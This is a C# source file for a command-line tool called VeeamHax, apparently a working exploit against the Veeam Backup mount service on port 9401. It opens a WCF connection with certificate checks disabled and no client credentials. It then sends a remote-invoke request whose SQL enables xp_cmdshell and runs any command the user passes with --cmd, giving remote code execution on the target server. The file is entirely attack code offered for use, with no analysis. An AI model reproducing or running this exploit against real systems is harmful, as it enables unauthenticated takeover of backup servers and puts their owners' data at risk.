Program.cs

using System;
using System.ServiceModel;
using System.ServiceModel.Security;
using Veeam.Backup.Interaction.MountService;

namespace VeeamHax
{
    internal class Program
    {
        static void Main(string[] args)
        {
            string host = "127.0.0.1";
            int port = 9401;
            bool verbose = false;
            string cmd = null;

            for (int i = 0; i < args.Length; i++)
            {
                if (args[i] == "--target" && i + 1 < args.Length)
                    host = args[i + 1];
                else if (args[i] == "--port" && i + 1 < args.Length)
                    port = Int32.Parse(args[i + 1]);
                else if (args[i] == "--verbose")
                    verbose = true;
                else if (args[i] == "--cmd" && i + 1 < args.Length)
                    cmd = args[i + 1];
                else if (args[i] == "--help" || args[i] == "-h" || args[i] == "/?")
                {
                    Console.WriteLine("Usage: VeeamHax.exe [--verbose] --target 192.168.0.1 --port 9401 [--cmd \"c:\\windows\\notepad.exe\"]");
                    return;
                }
            }

            Console.WriteLine("Targeting {0}:{1}", host, port);

            NetTcpBinding binding = new NetTcpBinding();
            binding.Security.Mode = SecurityMode.Transport;
            binding.Security.Transport.ClientCredentialType = TcpClientCredentialType.None;
            binding.Name = "foo";

            Uri uri = new Uri($"net.tcp://{host}:{port}/");
            EndpointAddress endpoint = new EndpointAddress(uri, EndpointIdentity.CreateDnsIdentity("Veeam Backup Server Certificate"));

            ChannelFactory<IRemoteInvokeService> channelFactory = new ChannelFactory<IRemoteInvokeService>(binding, endpoint);
            channelFactory.Credentials.ServiceCertificate.SslCertificateAuthentication = new X509ServiceCertificateAuthentication
            {
                CertificateValidationMode = X509CertificateValidationMode.None
            };

            IRemoteInvokeService channel = channelFactory.CreateChannel(endpoint);

            if (cmd != null)
            {
                string spec = $@"
    <RemoteInvokeSpec ContextSessionId=""{Guid.NewGuid()}"">
        <DbGetDataTableRemoteInvokeSpec>
            <SqlCommand>EXEC sp_configure 'show advanced options', 1; EXEC sp_configure reconfigure; EXEC sp_configure 'xp_cmdshell', 1; EXEC sp_configure reconfigure; EXEC xp_cmdshell '{cmd}';</SqlCommand>
            <CommandType>1</CommandType>
        </DbGetDataTableRemoteInvokeSpec>
    </RemoteInvokeSpec>
    ";

                channel.GetDataTable(ERemoteInvokeScope.DatabaseAccessor, ERemoteInvokeMethod.GetDataTable, spec);
            }

            if (verbose && cmd != null)
            {
                Console.WriteLine("Executed command: {0}", cmd);
            }
        }
    }
}